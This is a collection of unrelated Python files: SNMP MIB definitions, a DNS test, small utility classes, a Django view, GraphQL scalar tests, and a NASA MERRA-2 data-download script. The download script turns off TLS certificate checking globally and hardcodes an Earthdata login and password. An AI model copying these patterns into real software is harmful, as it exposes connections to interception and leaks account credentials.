if mibBuilder.loadTexts: acPerfCpMessageRetransmissions.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpMessageRetransmissions.setDescription('Each time the call engine times out waiting for an acknowledgement it retransmits the control protocol message, unless the number of max retransmissions is exceeded. This counter is incremented each time a message is retransmitted due to a timeout. Products: All Capabilities: All')
acPerfCpMessageMaxRetransmissionsExceeded = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpMessageMaxRetransmissionsExceeded.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpMessageMaxRetransmissionsExceeded.setDescription('Number of times the call control message maximum retransmission count was exceeded. The gateway attempted several times to send a message to the call agent, but each time, an ack was not received. A failure of this type results in a failed call and is usually an indication that subsequent calls will fail. This problem is typically a result of the call agent being down or a result of a network problem. Products: All Capabilities: All')
acPerfCpMessagesFromUntrustedSources = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfCpMessagesFromUntrustedSources.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfCpMessagesFromUntrustedSources.setDescription('Number of messages received from untrusted sources, that is from network nodes other than the node on which the call agent is running. Products: All Capabilities: All')
acPerfRtp = MibIdentifier((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2))
acPerfRtpSenderPackets = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpSenderPackets.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpSenderPackets.setDescription('Total number of RTP packets sent by the system for this card. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpSenderOctets = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpSenderOctets.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpSenderOctets.setDescription('Total number of non-header RTP octets sent by this card. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpReceiverPackets = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpReceiverPackets.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpReceiverPackets.setDescription('Total number of RTP packets received by the system for this card. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpReceiverOctets = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpReceiverOctets.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpReceiverOctets.setDescription('Total number of non-header RTP octets received by this card. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpRcvrLostPackets = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpRcvrLostPackets.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpRcvrLostPackets.setDescription('Total number of RTP packets lost as observed by this card. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpFailedDueToLackOfResources = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpFailedDueToLackOfResources.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpFailedDueToLackOfResources.setDescription('The number of times a rtp request was rejected due to lack of resources since the last application restart. Products: IPmedia 2000')
acPerfRtpSimplexInSessionsTotal = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpSimplexInSessionsTotal.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpSimplexInSessionsTotal.setDescription('Total number of simplex input RTP sessions. A simplex (one-way) session would be used to play an announcement. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpSimplexInSessionsCurrent = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpSimplexInSessionsCurrent.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpSimplexInSessionsCurrent.setDescription('Current number of simplex input RTP sessions. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpSimplexOutSessionsTotal = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpSimplexOutSessionsTotal.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpSimplexOutSessionsTotal.setDescription('Total number of simplex output RTP sessions. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpSimplexOutSessionsCurrent = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpSimplexOutSessionsCurrent.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpSimplexOutSessionsCurrent.setDescription('Current number of simplex output RTP sessions. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpDuplexSessionsTotal = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpDuplexSessionsTotal.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpDuplexSessionsTotal.setDescription('Total number of duplex RTP sessions. A duplex (two-way) session would be used for conferencing. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfRtpDuplexSessionsCurrent = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 12), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfRtpDuplexSessionsCurrent.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfRtpDuplexSessionsCurrent.setDescription('Current number of duplex RTP sessions. Products: All IP-based products Capabilities: IVR, BCT, Conferencing, Test Trunks')
acPerfSystem = MibIdentifier((1, 3, 6, 1, 4, 1, 5003, 10, 1, 3))
acPerfSystemPacketEndpoints = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 3, 1), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfSystemPacketEndpoints.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfSystemPacketEndpoints.setDescription("Number of endpoints reserved for all packet network-related functions (conferencing, plays, etc.). This is an attribute that is derived from the type of hardware and the values of certain config parameters. Currently, its value is fixed after init-time. In the future, it's value might be impacted by configuration of online parameters. That is, its value might increase or decrease over time. For example, in a multi-card system, addition of a board would cause it to increase. Products: All Capabilities: All ")
acPerfSystemPacketEndpointsInUse = MibScalar((1, 3, 6, 1, 4, 1, 5003, 10, 1, 3, 2), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: acPerfSystemPacketEndpointsInUse.setStatus('deprecated')
if mibBuilder.loadTexts: acPerfSystemPacketEndpointsInUse.setDescription('Number of endpoints that the call engine is currently using for all packet network-related functions (conferencing, plays, etc.). Products: All Capabilities: All')
mibBuilder.exportSymbols("AcPerfMediaGateway", acPerfCpMessageReceiveSuccesses=acPerfCpMessageReceiveSuccesses, acProducts=acProducts, acPerfRtpDuplexSessionsTotal=acPerfRtpDuplexSessionsTotal, acPerfCpMessageSendErrors=acPerfCpMessageSendErrors, acPerformance=acPerformance, acGeneric=acGeneric, acPerfMediaGateway=acPerfMediaGateway, acPerfRtpRcvrLostPackets=acPerfRtpRcvrLostPackets, acPerfRtpSenderPackets=acPerfRtpSenderPackets, acPerfRtpReceiverOctets=acPerfRtpReceiverOctets, acRegistrations=acRegistrations, acPerfCpNumDupsForCompletedTransactions=acPerfCpNumDupsForCompletedTransactions, acPerfCpMessagesFromUntrustedSources=acPerfCpMessagesFromUntrustedSources, acPerfRtpSimplexOutSessionsTotal=acPerfRtpSimplexOutSessionsTotal, acPerfCpProtocolSyntaxErrors=acPerfCpProtocolSyntaxErrors, acPerfRtpReceiverPackets=acPerfRtpReceiverPackets, acPerfCpMessageSendSuccesses=acPerfCpMessageSendSuccesses, acPerfRtpFailedDueToLackOfResources=acPerfRtpFailedDueToLackOfResources, acPerfCpNumDupsForOutstandingTransactions=acPerfCpNumDupsForOutstandingTransactions, acPerfCpMessageReceiveErrors=acPerfCpMessageReceiveErrors, acPerfRtpDuplexSessionsCurrent=acPerfRtpDuplexSessionsCurrent, acPerfRtpSimplexOutSessionsCurrent=acPerfRtpSimplexOutSessionsCurrent, acPerfRtpSimplexInSessionsTotal=acPerfRtpSimplexInSessionsTotal, PYSNMP_MODULE_ID=acPerfMediaGateway, acPerfCpMessageRetransmissions=acPerfCpMessageRetransmissions, acPerfCpMessageMaxRetransmissionsExceeded=acPerfCpMessageMaxRetransmissionsExceeded, acPerfCp=acPerfCp, acPerfSystem=acPerfSystem, acPerfRtpSenderOctets=acPerfRtpSenderOctets, acPerfRtpSimplexInSessionsCurrent=acPerfRtpSimplexInSessionsCurrent, acPerfRtp=acPerfRtp, acPerfSystemPacketEndpointsInUse=acPerfSystemPacketEndpointsInUse, audioCodes=audioCodes, acPerfSystemPacketEndpoints=acPerfSystemPacketEndpoints)
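# A hedged usage sketch (not part of the generated MIB module): reading one of the
# counters defined above with the pysnmp high-level API. The agent host, port and
# community string ('demo-agent', 161, 'public') are placeholders.
def _demo_query_rtp_sender_packets():
    from pysnmp.hlapi import (SnmpEngine, CommunityData, UdpTransportTarget,
                              ContextData, ObjectType, ObjectIdentity, getCmd)
    error_indication, error_status, error_index, var_binds = next(getCmd(
        SnmpEngine(),
        CommunityData('public'),
        UdpTransportTarget(('demo-agent', 161)),
        ContextData(),
        # acPerfRtpSenderPackets is (1, 3, 6, 1, 4, 1, 5003, 10, 1, 2, 1); '.0' selects the scalar instance
        ObjectType(ObjectIdentity('1.3.6.1.4.1.5003.10.1.2.1.0'))))
    if error_indication or error_status:
        print(error_indication or error_status.prettyPrint())
    else:
        for name, value in var_binds:
            print(name.prettyPrint(), '=', value.prettyPrint())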
|
from jumpscale import j
import dns.resolver
import time
import logging
# Module-level logger: the original code referenced self.logger inside a plain
# function, which would raise a NameError.
logger = logging.getLogger(__name__)
def test(geodns_install=False, dnsresolver_install=True, port=3333, tmux=True):
    # start a geodns instance (this is the main object to be used; it is an
    # abstraction of the domain object)
prefab = j.tools.prefab.local
geodns = prefab.apps.geodns
if dnsresolver_install:
prefab.core.run('pip install dnspython')
# prefab.core.file_download("http://www.dnspython.org/kits3/1.12.0/dnspython3-1.12.0.tar.gz",
# to="$TMPDIR", overwrite=False, expand=True)
# tarpath = prefab.core.find("$TMPDIR", recursive=True, pattern="*dns*.gz", type='f')[0]
# extracted = prefab.core.file_expand(tarpath, "$TMPDIR")
# prefab.core.run("cd %s && python setup.py" % extracted)
if geodns_install:
geodns.install(reset=True)
geodns.start(port=port, tmux=tmux)
    # create a domain (the domain object is used for specific transactions
    # and is exposed for debugging purposes)
domain_manager = j.clients.domainmanager.get(prefab)
domain = domain_manager.ensure_domain("gig.com", serial=3, ttl=600)
    logger.info(domain._a_records)
    logger.info(domain._cname_records)
# add an A record
domain.add_a_record("123.45.123.1", "www")
domain.save()
# test_connection
my_resolver = dns.resolver.Resolver()
my_resolver.nameservers = ['127.0.0.1', '192.168.122.250']
my_resolver.port = port
answer1 = my_resolver.query('www.gig.com')
time.sleep(5)
    if 1 == answer1.rrset[0].rdtype and "123.45.123.1" == answer1.rrset[0].to_text():
        logger.info("add A record Test SUCCESS")
    else:
        logger.info("failure")
# add cname record
domain.add_cname_record("www", "grid")
domain.save()
# test connection
answer2 = my_resolver.query("grid.gig.com", rdtype="cname")
time.sleep(5)
    if 5 == answer2.rrset[0].rdtype and "www.gig.com." == answer2.rrset[0].to_text():
        logger.info("add CNAME record Test SUCCESS")
    else:
        logger.info("failure")
    logger.info(str(type(answer1)) + str(type(answer2)))
# get A record
a_records = domain.get_a_record()
    if a_records == {"www": [["123.45.123.1", 100]]}:
        logger.info("get A record Test SUCCESS")
    # get cname record
    cname_records = domain.get_cname_record()
    if cname_records == {"grid": "www"}:
        logger.info("get CNAME record Test SUCCESS")
# delete A record
domain.del_a_record("www", full=True)
domain.save()
    # test deletion
    try:
        answer1 = my_resolver.query('www.gig.com')
    except Exception as e:
        logger.info(str(e))
# delete cname record
domain.del_cname_record("grid")
domain.save()
    # test deletion
    try:
        answer1 = my_resolver.query('grid.gig.com')
    except Exception as e:
        logger.info(str(e))
if __name__ == "__main__":
test(geodns_install=False)
|
from blitzcrank import Blitzcrank
b = Blitzcrank("RGAPI-this-doesnt-really-matter","euw1")
champion_id = "222"
champion_name = b.champion.by_id(champion_id)["name"]
item_id = "350"
item_name = b.item.by_id(item_id)["name"]
print(champion_name, item_name)
|
class Scope:
__scope_id = 0
def __init__(self, data=None):
self.__data = data or {}
self.__data['id'] = Scope.__scope_id
Scope.__scope_id += 1
def __get__(attr): return lambda self: self.__data.get(attr)
def __set__(attr):
def _set(self, value):
            if self.__data.get(attr) is not None:
                raise Exception(
                    f"Cannot redefine the value of '{attr}'")
            if attr == 'begin' or attr == 'ending':
                if not isinstance(value, dict):
                    raise Exception(
                        "The value must be a dict containing the 'line' and 'column' attributes.")
                elif value.get('line') is None or not isinstance(value.get('line'), int):
                    raise Exception("There must be an integer 'line' attribute")
                elif value.get('column') is None or not isinstance(value.get('column'), int):
                    raise Exception("There must be an integer 'column' attribute")
                else:
                    data = {}
                    data['line'] = value.get('line')
                    data['column'] = value.get('column')
                    value = data
self.__data[attr] = value
return _set
def __repr__(self):
return f'{self.id}:{self.name}:[{self.begin.get("line")}-{self.begin.get("column")}]:[{self.ending.get("line")}-{self.ending.get("column")}]'
def __mul__(self, value):
ret = [self]
for _ in range(value - 1):
ret.append(Scope())
return ret
name = property(__get__('name'), __set__('name'))
id = property(__get__('id'), __set__('id'))
begin = property(__get__('begin'), __set__('begin'))
ending = property(__get__('ending'), __set__('ending'))
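# A minimal usage sketch for Scope: each attribute may be assigned only once, and
# 'begin'/'ending' must be dicts with integer 'line' and 'column' entries.
if __name__ == '__main__':
    scope = Scope()
    scope.name = 'main'
    scope.begin = {'line': 1, 'column': 0}
    scope.ending = {'line': 10, 'column': 4}
    print(scope)          # e.g. 0:main:[1-0]:[10-4]
    scopes = scope * 3    # [scope, Scope(), Scope()] via __mul__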
|
from kicker.SymbolMapper import SymbolMapper
class ConsoleView(object):
def __init__(self):
self.header = "Current user input state:"
self.pattern = "{0: <30}{1} {2} {3} {4}"
self.mapper = SymbolMapper()
def renderView(self, inputs):
mapped = self.mapper.inputs2symbols(inputs)
rotation = mapped[1::2]
translation = mapped[0::2]
self.clearView()
self.printHeader(inputs)
self.printSeparator()
self.printNewline(2)
self.printRotation(rotation)
self.printNewline(2)
self.printTranslation(translation)
self.printNewline(2)
self.printSeparator()
def printSeparator(self):
print("-" * 60)
def printHeader(self, inputs):
print(self.header, inputs)
def printRotation(self, rotation):
print(self.pattern.format(" ", "G", "D", "M", "S"))
self.printNewline(1)
print(self.pattern.format("Rotation",
rotation[0], rotation[1], rotation[2], rotation[3]))
# print self.pattern.format("Rotation ", **rotation)
def printTranslation(self, translation):
print(self.pattern.format(" ", "G", "D", "M", "S"))
self.printNewline(1)
print(self.pattern.format("Translation ",
translation[0], translation[1], translation[2], translation[3]))
# print self.pattern.format("Translation", **translation)
def printNewline(self, number):
print("\n" * number,)
def clearView(self):
import os
os.system('clear')
|
#$Id$
from books.model.PageContext import PageContext
class ContactList:
"""This class is used to create an object for contact list."""
def __init__(self):
""" Initialize contacts list and page context."""
self.contacts = []
self.page_context = PageContext()
def set_contacts(self, contact):
"""Insert contact object to contacts list.
Args:
contact(instance): Contact object.
"""
self.contacts.append(contact)
def get_contacts(self):
"""Get contacts list.
Returns:
list: List of contacts object.
"""
return self.contacts
def set_page_context(self, page_context):
"""Set page context.
Args:
instance: Page_context object.
"""
self.page_context = page_context
def get_page_context(self):
"""Get page context.
Returns:
instance: Page context object.
"""
return self.page_context
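# A minimal usage sketch, assuming Contact instances come from elsewhere in the
# books.model package; the list accepts any contact object, so a plain object()
# stands in here.
if __name__ == '__main__':
    contact_list = ContactList()
    contact_list.set_contacts(object())        # placeholder for a Contact instance
    print(len(contact_list.get_contacts()))    # 1
    print(contact_list.get_page_context())     # the PageContext instance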
|
from __future__ import absolute_import
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.utils.translation import ugettext_lazy as _
from common.utils import encapsulate
from permissions.models import Permission
from .api import get_job_list
from .permissions import PERMISSION_VIEW_JOB_LIST
def job_list(request):
Permission.objects.check_permissions(request.user, [PERMISSION_VIEW_JOB_LIST])
context = {
'object_list': get_job_list(),
'title': _(u'interval jobs'),
'extra_columns': [
{
'name': _(u'label'),
'attribute': encapsulate(lambda job: job['title'])
},
{
'name': _(u'start date time'),
'attribute': encapsulate(lambda job: job['job'].trigger.start_date)
},
{
'name': _(u'interval'),
'attribute': encapsulate(lambda job: job['job'].trigger.interval)
},
],
'hide_object': True,
}
return render_to_response('generic_list.html', context,
context_instance=RequestContext(request))
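# A hedged sketch of how this view might be wired into a URLconf for the Django
# versions this code targets (the render_to_response/context_instance era); the
# URL pattern and name are assumptions, not taken from the project.
#
#   from django.conf.urls import url
#   from .views import job_list
#
#   urlpatterns = [
#       url(r'^jobs/$', job_list, name='job_list'),
#   ]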
|
from decimal import Decimal
import pytest
from tartiflette.scalar.builtins.int import ScalarInt
@pytest.mark.parametrize(
"value,should_raise_exception,expected",
[
(None, True, "Int cannot represent non-integer value: < None >."),
(True, False, 1),
(False, False, 0),
("", True, "Int cannot represent non-integer value: < >."),
(0, False, 0),
(1, False, 1),
(3, False, 3),
(
-2_147_483_649,
True,
"Int cannot represent non 32-bit signed integer value: < -2147483649 >.",
),
(
2_147_483_648,
True,
"Int cannot represent non 32-bit signed integer value: < 2147483648 >.",
),
(0.0, False, 0),
(1.0, False, 1),
(3.0, False, 3),
(0.1, True, "Int cannot represent non-integer value: < 0.1 >."),
(1.1, True, "Int cannot represent non-integer value: < 1.1 >."),
(3.1, True, "Int cannot represent non-integer value: < 3.1 >."),
(Decimal(0.0), False, 0),
(Decimal(1.0), False, 1),
(Decimal(3.0), False, 3),
(
Decimal(0.1),
True,
"Int cannot represent non-integer value: < 0.1000000000000000055511151231257827021181583404541015625 >.",
),
(
Decimal(1.1),
True,
"Int cannot represent non-integer value: < 1.100000000000000088817841970012523233890533447265625 >.",
),
(
Decimal(3.1),
True,
"Int cannot represent non-integer value: < 3.100000000000000088817841970012523233890533447265625 >.",
),
("0", False, 0),
("1", False, 1),
("3", False, 3),
("0.0", False, 0),
("1.0", False, 1),
("3.0", False, 3),
("0.1", True, "Int cannot represent non-integer value: < 0.1 >."),
("1.1", True, "Int cannot represent non-integer value: < 1.1 >."),
("3.1", True, "Int cannot represent non-integer value: < 3.1 >."),
("0e0", False, 0),
("1e0", False, 1),
("3e0", False, 3),
("0e1", False, 0),
("1e1", False, 10),
("3e1", False, 30),
("0.1e1", False, 1),
("1.1e1", False, 11),
("3.1e1", False, 31),
(
"0.11e1",
True,
"Int cannot represent non-integer value: < 0.11e1 >.",
),
(
"1.11e1",
True,
"Int cannot represent non-integer value: < 1.11e1 >.",
),
(
"3.11e1",
True,
"Int cannot represent non-integer value: < 3.11e1 >.",
),
(
float("inf"),
True,
"Int cannot represent non-integer value: < inf >.",
),
("A", True, "Int cannot represent non-integer value: < A >."),
("{}", True, "Int cannot represent non-integer value: < {} >."),
({}, True, "Int cannot represent non-integer value: < {} >."),
(
Exception("LOL"),
True,
"Int cannot represent non-integer value: < LOL >.",
),
(
Exception,
True,
"Int cannot represent non-integer value: < <class 'Exception'> >.",
),
],
)
def test_scalar_int_coerce_output(value, should_raise_exception, expected):
if should_raise_exception:
with pytest.raises(TypeError, match=expected):
ScalarInt().coerce_output(value)
else:
assert ScalarInt().coerce_output(value) == expected
@pytest.mark.parametrize(
"value,should_raise_exception,expected",
[
(None, True, "Int cannot represent non-integer value: < None >."),
(True, True, "Int cannot represent non-integer value: < True >."),
(False, True, "Int cannot represent non-integer value: < False >."),
("", True, "Int cannot represent non-integer value: < >."),
(0, False, 0),
(1, False, 1),
(3, False, 3),
(0.0, False, 0),
(1.0, False, 1),
(3.0, False, 3),
(
-2_147_483_649,
True,
"Int cannot represent non 32-bit signed integer value: < -2147483649 >.",
),
(
2_147_483_648,
True,
"Int cannot represent non 32-bit signed integer value: < 2147483648 >.",
),
(0.1, True, "Int cannot represent non-integer value: < 0.1 >."),
(1.1, True, "Int cannot represent non-integer value: < 1.1 >."),
(3.1, True, "Int cannot represent non-integer value: < 3.1 >."),
("0", True, "Int cannot represent non-integer value: < 0 >."),
("1", True, "Int cannot represent non-integer value: < 1 >."),
("3", True, "Int cannot represent non-integer value: < 3 >."),
("0.0", True, "Int cannot represent non-integer value: < 0.0 >."),
("1.0", True, "Int cannot represent non-integer value: < 1.0 >."),
("3.0", True, "Int cannot represent non-integer value: < 3.0 >."),
("0.1", True, "Int cannot represent non-integer value: < 0.1 >."),
("1.1", True, "Int cannot represent non-integer value: < 1.1 >."),
("3.1", True, "Int cannot represent non-integer value: < 3.1 >."),
("0e0", True, "Int cannot represent non-integer value: < 0e0 >."),
("1e0", True, "Int cannot represent non-integer value: < 1e0 >."),
("3e0", True, "Int cannot represent non-integer value: < 3e0 >."),
("0e1", True, "Int cannot represent non-integer value: < 0e1 >."),
("1e1", True, "Int cannot represent non-integer value: < 1e1 >."),
("3e1", True, "Int cannot represent non-integer value: < 3e1 >."),
("0.1e1", True, "Int cannot represent non-integer value: < 0.1e1 >."),
("1.1e1", True, "Int cannot represent non-integer value: < 1.1e1 >."),
("3.1e1", True, "Int cannot represent non-integer value: < 3.1e1 >."),
(
"0.11e1",
True,
"Int cannot represent non-integer value: < 0.11e1 >.",
),
(
"1.11e1",
True,
"Int cannot represent non-integer value: < 1.11e1 >.",
),
(
"3.11e1",
True,
"Int cannot represent non-integer value: < 3.11e1 >.",
),
(
float("inf"),
True,
"Int cannot represent non-integer value: < inf >.",
),
("A", True, "Int cannot represent non-integer value: < A >."),
("{}", True, "Int cannot represent non-integer value: < {} >."),
({}, True, "Int cannot represent non-integer value: < {} >."),
(
Exception("LOL"),
True,
"Int cannot represent non-integer value: < LOL >.",
),
(
Exception,
True,
"Int cannot represent non-integer value: < <class 'Exception'> >.",
),
],
)
def test_scalar_int_coerce_input(value, should_raise_exception, expected):
if should_raise_exception:
with pytest.raises(TypeError, match=expected):
ScalarInt().coerce_input(value)
else:
assert ScalarInt().coerce_input(value) == expected
|
"""Test that `if` in formatted string literal won't break Pylint."""
# pylint: disable=missing-docstring, pointless-statement, using-constant-test
f'{"+" if True else "-"}'
if True:
pass
elif True:
pass
|
#*************************************************************************************************************************
#import the required Python libraries. If any of the following import commands fail check the local Python environment
#and install any missing packages.
#*************************************************************************************************************************
import json
import pathlib
import pika
import base64
import numpy as np
from netCDF4 import Dataset
import matplotlib.pyplot as plt
import cartopy.crs as ccrs
import io
import logging
import os.path
import sys
import json
import urllib3
import certifi
import requests
from time import sleep
from http.cookiejar import CookieJar
import urllib.request
from urllib.parse import urlencode
import getpass
import ssl
import os
ssl._create_default_https_context = ssl._create_unverified_context
#Initialize the urllib PoolManager and set the base URL for the API requests that will be sent to the GES DISC subsetting service.
# Create a urllib PoolManager instance to make requests.
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED',ca_certs=certifi.where())
# Set the URL for the GES DISC subset service endpoint
url = 'https://disc.gsfc.nasa.gov/service/subset/jsonwsp'
################################################### RABBITMQ CODE BEGINS ###############################################################################
# establish connection with rabbitmq server
logger = logging.getLogger('django')
connection = pika.BlockingConnection(pika.ConnectionParameters('orion-rabbit'))
channel = connection.channel()
logger.info(" Connected to RBmq server")
#create/ declare queue
channel.queue_declare(queue='merra_plot_rx')
################################################### RABBITMQ CODE ENDS #################################################################################
# Define a local general-purpose method that submits a JSON-formatted Web Services Protocol (WSP)
# request to the GES DISC server, checks for any errors, and then returns the response.
# It is defined once for convenience since this task will be repeated more than once.
# The method POSTs formatted JSON WSP requests to the GES DISC endpoint URL.
def get_http_data(request):
#logger.info('request',request['methodname'])
hdrs = {'Content-Type': 'application/json',
'Accept' : 'application/json'}
data = json.dumps(request)
#logger.info('data:',data)
#logger.info("url",url)
r = http.request('POST', url, body=data, headers=hdrs)
response = json.loads(r.data)
#logger.info('response:',response['type'])
# Check for errors
if response['type'] == 'jsonwsp/fault' :
logger.info('API Error: faulty %s request' % response['methodname'])
sys.exit(1)
return response
# The following method constructs the subset request and returns the subsetted records
def constructSubsetData(minLatitude,maxLatitude, minLongitude, maxLongitude, date):
# Define the parameters for the data subset
# product = 'M2I3NPASM_V5.12.4'
# # varNames =['T', 'RH', 'O3']
# varNames =['T']
# minlon = -180
# maxlon = 180
# minlat = -90
# maxlat = -45
# begTime = '1980-01-01'
# endTime = '1980-01-01'
# begHour = '00:00'
# endHour = '00:00'
# Define the parameters for the data subset
product = 'M2I3NPASM_V5.12.4'
varNames =['T']
minlat = int(minLatitude)
minlon = int(minLongitude)
maxlat = int(maxLatitude)
maxlon = int(maxLongitude)
begTime = date
endTime = date
begHour = '00:00'
endHour = '00:00'
#logger.info("Beg time:",begTime)
# Subset only the mandatory pressure levels (units are hPa)
# 1000 925 850 700 500 400 300 250 200 150 100 70 50 30 20 10 7 5 3 2 1
dimName = 'lev'
dimVals = [1,4,7,13,17,19,21,22,23,24,25,26,27,29,30,31,32,33,35,36,37]
# Construct the list of dimension name:value pairs to specify the desired subset
dimSlice = []
for i in range(len(dimVals)):
dimSlice.append({'dimensionId': dimName, 'dimensionValue': dimVals[i]})
#logger.info('dimSlice:',dimSlice)
# Construct JSON WSP request for API method: subset
subset_request = {
'methodname': 'subset',
'type': 'jsonwsp/request',
'version': '1.0',
'args': {
'role' : 'subset',
'start' : begTime,
'end' : begTime,
'box' : [minlon, minlat, maxlon, maxlat],
'crop' : True,
'data': [{'datasetId': product,
'variable' : varNames[0],
'slice': dimSlice
}]
}
}
#logger.info("subset request:",subset_request['args']['box'])
# Submit the subset request to the GES DISC Server
response = get_http_data(subset_request)
# Report the JobID and initial status
myJobId = response['result']['jobId']
#logger.info('Job ID: '+myJobId)
#logger.info('Job status: '+response['result']['Status'])
# Construct JSON WSP request for API method: GetStatus
status_request = {
'methodname': 'GetStatus',
'version': '1.0',
'type': 'jsonwsp/request',
'args': {'jobId': myJobId}
}
# Check on the job status after a brief nap
while response['result']['Status'] in ['Accepted', 'Running']:
sleep(5)
response = get_http_data(status_request)
status = response['result']['Status']
percent = response['result']['PercentCompleted']
#logger.info('Job status: %s (%d%c complete)' % (status,percent,'%'))
if response['result']['Status'] == 'Succeeded' :
logger.info('Job Finished: %s' % response['result']['message'])
else :
logger.info('Job Failed: %s' % response['fault']['code'])
sys.exit(1)
# Construct JSON WSP request for API method: GetResult
batchsize = 20
results_request = {
'methodname': 'GetResult',
'version': '1.0',
'type': 'jsonwsp/request',
'args': {
'jobId': myJobId,
'count': batchsize,
'startIndex': 0
}
}
# Retrieve the results in JSON in multiple batches
# Initialize variables, then submit the first GetResults request
# Add the results from this batch to the list and increment the count
results = []
count = 0
#logger.info("result request:",results_request)
response = get_http_data(results_request)
count = count + response['result']['itemsPerPage']
results.extend(response['result']['items'])
# Increment the startIndex and keep asking for more results until we have them all
total = response['result']['totalResults']
while count < total :
results_request['args']['startIndex'] += batchsize
response = get_http_data(results_request)
count = count + response['result']['itemsPerPage']
results.extend(response['result']['items'])
# Check on the bookkeeping
logger.info('Retrieved %d out of %d expected items' % (len(results), total))
# Sort the results into documents and URLs
docs = []
urls = []
for item in results :
try:
# print('{} Item:'.format(item))
if item['start'] and item['end'] : urls.append(item)
except:
docs.append(item)
# Print out the documentation links, but do not download them
# print('\nDocumentation:')
# for item in docs : print(item['label']+': '+item['link'])
    print('I am here')
return urls
# Login and Download merra data
def downloadMerraData(username,password,minLatitude,maxLatitude, minLongitude, maxLongitude, date):
# Earthdata Login
if not username:
username = 'teamorion2022'
if not password:
password = 'AdsSpring2022'
    # Create a password manager to deal with the 401 response that is returned from Earthdata Login
password_manager = urllib.request.HTTPPasswordMgrWithDefaultRealm()
password_manager.add_password(None, "https://urs.earthdata.nasa.gov", username, password)
    # Create a cookie jar for storing cookies. This is used to store and return the session cookie given to us by the data server
cookie_jar = CookieJar()
# Install all the handlers.
opener = urllib.request.build_opener (urllib.request.HTTPBasicAuthHandler (password_manager),urllib.request.HTTPCookieProcessor (cookie_jar))
urllib.request.install_opener(opener)
# Open a request for the data, and download files
#logger.info('\n HTTP_services output:')
urls=constructSubsetData(minLatitude,maxLatitude, minLongitude, maxLongitude, date)
# logger.info(urls['link'])
print("This is url stuff: {}".format(urls))
# print('I am also here 1')
url = urls[0]['link']
#logger.info('URL : {}'.format(URL))
DataRequest = urllib.request.Request(url)
DataResponse = urllib.request.urlopen(DataRequest)
DataBody = DataResponse.read()
# print("This is dataBody: {}".format(DataBody))
print('I am also here 2')
"""response = {}
response['fileName'] = urls[0]['label']
response['dataBody'] = DataBody"""
response = {}
# dirName='test'
# if not os.path.isdir(dirName):
# print('The directory is not present. Creating a new one..')
# # print('Current Working Directory:{} '.format(os.getcwd()))
# os.mkdir(dirName)
